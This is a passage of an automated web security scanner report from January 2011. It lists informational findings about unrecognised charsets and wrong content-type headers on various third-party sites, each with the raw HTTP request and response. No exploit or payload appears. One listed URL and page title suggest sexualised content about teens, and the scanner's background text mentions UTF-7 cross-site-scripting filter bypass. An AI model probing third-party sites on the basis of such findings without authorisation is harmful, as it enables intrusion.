GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

30.166. http://xads.zedo.com/ads3/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads3/a

Request

GET /ads3/a HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31. HTML uses unrecognised charset previous next
There are 13 instances of this issue:

http://home.big.jp/flets/
http://joomlaportal.ru/content/view/2239/70/
http://sorgalla.com/
http://sorgalla.com/jcarousel/
http://www.autotrader.com/fyc/index.jsp/x22
http://www.autotrader.com/hornav/trader/index.jsp/x22
http://www.autotrader.com/research/certified-cars/index.jsp/x22
http://www.autotrader.com/research/index.jsp/x22
http://www.autotrader.com/research/new-cars/index.jsp/x22
http://www.autotrader.com/research/used-cars/index.jsp/x22
http://www.autotrader.com/x22/x3e/x3cli
http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22
http://www.joomla-ua.org/content/view/400/10/

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

31.1. http://home.big.jp/flets/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://home.big.jp
Path:	/flets/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Shift_JIS
x-sjis

Request

GET /flets/ HTTP/1.1
Host: home.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:22 GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html; charset=Shift_JIS
Content-Length: 20938

<HTML>
<HEAD>
<Title>.t...b.cADSL....B.t...b.c../.l.N.X.g/.v...~.A...... | Amusement BiG-NET http://home.big.jp/flets/</Title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=x-sjis">
<Meta Name="keywords" Content=".t...b.cADSL....B.t...b.c../.l.N.X.g/.v...~.A...... 1GB.....^...T.[.o.[.E.v...o.C._.[ Amusement BiG-NET">
...[SNIP]...

31.2. http://joomlaportal.ru/content/view/2239/70/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://joomlaportal.ru
Path:	/content/view/2239/70/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1251

Request

GET /content/view/2239/70/ HTTP/1.1
Host: joomlaportal.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.3. http://sorgalla.com/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://sorgalla.com
Path:	/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

"UTF-8"
UTF-8

Request

GET / HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:33 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 39294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="PHP, Zend Framework, Datenbanken und was sonst noch so anf..llt." />
...[SNIP]...

31.4. http://sorgalla.com/jcarousel/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://sorgalla.com
Path:	/jcarousel/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

"UTF-8"
UTF-8

Request

GET /jcarousel/ HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:31 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="PHP, Zend Framework, Datenbanken und was sonst noch so anf..llt." />
...[SNIP]...

31.5. http://www.autotrader.com/fyc/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.autotrader.com
Path:	/fyc/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /fyc/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.6. http://www.autotrader.com/hornav/trader/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.autotrader.com
Path:	/hornav/trader/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /hornav/trader/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.7. http://www.autotrader.com/research/certified-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.autotrader.com
Path:	/research/certified-cars/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /research/certified-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.8. http://www.autotrader.com/research/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.autotrader.com
Path:	/research/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /research/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.9. http://www.autotrader.com/research/new-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.autotrader.com
Path:	/research/new-cars/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /research/new-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.10. http://www.autotrader.com/research/used-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.autotrader.com
Path:	/research/used-cars/index.jsp/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /research/used-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.11. http://www.autotrader.com/x22/x3e/x3cli previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.autotrader.com
Path:	/x22/x3e/x3cli

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.12. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.heroturko.org
Path:	/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1254

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 16:45:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Last-Modified: Mon, 24 Jan 2011 06:45:19 +0000 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 45000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head>
<title>Nonude Young and Beauty Pretty Girl teen NN usenet binariesx22 H
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254" />
<meta name="description" content="Download All You Want!" />
...[SNIP]...

31.13. http://www.joomla-ua.org/content/view/400/10/ previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://www.joomla-ua.org
Path:	/content/view/400/10/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

windows-1251

Request

GET /content/view/400/10/ HTTP/1.1
Host: www.joomla-ua.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 24 Jan 2011 16:04:09 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.2.10
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 40cf95daa28915bd744253aab220bb63=-; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:09 GMT
Content-Length: 36298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk" xml:lang="uk">
<head>

...[SNIP]...
<meta http-equiv="Content-Language" content="uk" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<link rel="alternate" type="application/rss+xml" title="Joomla! ......." href="http://www.joomla-ua.org/component/option,com_rss/feed,RSS2.0/no_html,1/" />
...[SNIP]...

32. Content type incorrectly stated previous next
There are 115 instances of this issue:

http://7newsboston.disqus.com/block.js
http://7newsboston.disqus.com/embed/editcomment.html
http://7newsboston.disqus.com/hidereaction.js
http://7newsboston.disqus.com/highlight.js
http://7newsboston.disqus.com/kill.js
http://7newsboston.disqus.com/more_reactions.js
http://7newsboston.disqus.com/reportspam.js
http://7newsboston.disqus.com/show_user_votes.js
http://7newsboston.disqus.com/subscribe.js
http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/post_report/
http://7newsboston.disqus.com/thread_share.js
http://7newsboston.disqus.com/thread_vote.js
http://7newsboston.disqus.com/toggle_thread_closed.js
http://7newsboston.disqus.com/toggle_thread_killed.js
http://7newsboston.disqus.com/update_days_alive.js
http://7newsboston.disqus.com/update_moderate_all.js
http://7newsboston.disqus.com/vote.js
http://a1.twimg.com/profile_images/343677863/twitterProfilePhoto_mini.jpg
http://ad.masjo.com/www/images/9e5dbe547324652614df8323d01ce01e.jpg
http://ads.pointroll.com/PortalServe/
http://ads.tweetmeme.com/impression.jpg
http://api.kickapps.com/rest/getvideometadata/404472/94274
http://api.tweetmeme.com/url_info.jsonc
http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html
http://cdnserve.a-widget.com/service/getWidget2.kickAction
http://dave.willfork.com/slrnface/
http://delb.opt.fimserve.com/favicon.ico
http://delb.opt.fimserve.com/fimbid/
http://developer.joomla.org/media/system/js/mootools-more.js
http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
http://drn.newsguy.com/newsgrps.txt
http://fastdial.com/misc/favicon.ico
http://hostedusa3.whoson.com/include.js
http://hostedusa3.whoson.com/invite.js
http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml
http://joomlacode.org/favicon.ico
http://joomlacode.org/gf/
http://keywords.fmpub.net/
http://kickapps.yuku.com/kickapps/service/getWidget.kickAction
http://l.apture.com/v2/
http://mako.cc/projects/aub/COPYING
http://mako.cc/projects/aub/docs/Introducing_AUB
http://mako.cc/projects/aub/docs/USAGE
https://maps-api-ssl.google.com/maps/api/js
http://maps.google.com/maps/api/js
http://newsguy.com/user_info.asp
http://people.joomla.org/components/com_community/assets/group_thumb.png
http://people.joomla.org/plugins/system/cdscriptegrator/libraries/highslide/graphics/zoomout.cur
http://people.joomla.org/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js
http://ping.crowdscience.com/ping.js
http://r.nexac.com/e/getdata.xgi
http://rt.disqus.com/forums/realtime-cached.js
https://secure.disqus.com/embed/login.html
http://spongecell.com/api/events/915725/buy_tickets
http://spongecell.com/flash/download/264001/ad.swf
http://static.fmpub.net/site/tweetmeme
http://static.fmpub.net/zone/2671
http://static.fmpub.net/zone/2673
http://tweetmeme.s3.amazonaws.com/channel_thumbs/27.jpg
http://urls.api.twitter.com/1/urls/count.json
http://users.tpg.com.au/j_birch/plugins/superfish/changelog.txt
http://venedet.michnica.net/media/system/js/mootools-more.js
http://venedet.michnica.net/templates/beez_20/fonts/TitilliumMaps29L002.otf
http://wildspark.com/asher/ija/
http://www.abbreviations.com/images/goog.jpg
http://www.abbreviations.com/images/t.gif
http://www.adobe.com/xml/schemas/PolicyFile.xsd
http://www.apache.org/licenses/LICENSE-2.0
http://www.autobytel.com/syndication/act_newsletter_submit.cfm
http://www.autocheck.com/consumers/stylesheets/images/homepage/homepage_slides/slides_container.jpg
http://www.autocheck.com/favicon.ico
http://www.autotrader.com/ajax/backButtonFix.jsp
http://www.autotrader.com/no_cache/ac/hp_rotating_promos.asis
http://www.autotrader.com/no_cache/ac/index_wwwautoconnectcom_ac.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis
http://www.autotraderstatic.com/dwr/interface/MarketManager.js
http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js
http://www.autotraderstatic.com/dwr/interface/UserMsgController.js
http://www.autotraderstatic.com/inc/js/Tabber.js
http://www.autotraderstatic.com/inc/js/UltraPop.js
http://www.beirut.com/favicon.ico
http://www.cloudaccess.net/templates/rt_quasar_j15/css/vegur-m_0600-webfont.woff
http://www.facebook.com/extern/login_status.php
http://www.foxaudiencenetwork.com/favicon.ico
http://www.google.com/mbd
http://www.google.com/recaptcha/api/reload
http://www.kbsp.com/x/fonts/AKZIGBEM.TTF
http://www.kbsp.com/x/fonts/AKZIGBES.TTF
http://www.lithuanianjoomla.com/media/system/js/mootools-more.js
http://www.masjo.com/wp-content/plugins/archieve/images/913e4_new_script_host-39261-1228323711.jpeg
https://www.mytraderonline.com/css/promoCSS.php
https://www.mytraderonline.com/css/tolhomecss.php
https://www.mytraderonline.com/javascript/master_s_code.js
https://www.mytraderonline.com/javascript/realmedia.js
http://www.netlingo.com/favicon.ico
http://www.newsreaders.com/favicon.ico
http://www.paperg.com/jsfb/embed.php
http://www.parenthood.com/favicon.ico
http://www.soundingsonline.com/
http://www.traderonline.com/css/promoCSS.php
http://www.traderonline.com/css/tolhomecss.php
http://www.traderonline.com/javascript/master_s_code.js
http://www.traderonline.com/javascript/realmedia.js
http://www.vox.com/.shared/css/base.css
http://www.w3.org/1999/02/22-rdf-syntax-ns
http://www.w3.org/TR/html4/strict.dtd
http://www1.whdh.com/favicon.ico
http://www1.whdh.com/includes/elements/accordion_whdh-links
http://www1.whdh.com/js/sunbeam09.js
http://www3.whdh.com/favicon.ico

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

32.1. http://7newsboston.disqus.com/block.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/block.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /block.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:44 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.2. http://7newsboston.disqus.com/embed/editcomment.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/embed/editcomment.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /embed/editcomment.html HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19

Missing parameters.

32.3. http://7newsboston.disqus.com/hidereaction.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/hidereaction.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /hidereaction.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.4. http://7newsboston.disqus.com/highlight.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/highlight.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /highlight.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:39 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.5. http://7newsboston.disqus.com/kill.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/kill.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /kill.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:44 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 19

Missing parameters.

32.6. http://7newsboston.disqus.com/more_reactions.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/more_reactions.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /more_reactions.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:31 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.7. http://7newsboston.disqus.com/reportspam.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/reportspam.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /reportspam.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:58 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 19

Missing parameters.

32.8. http://7newsboston.disqus.com/show_user_votes.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/show_user_votes.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /show_user_votes.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.9. http://7newsboston.disqus.com/subscribe.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/subscribe.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /subscribe.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:38 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.10. http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/post_report/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/post_report/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/post_report/ HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
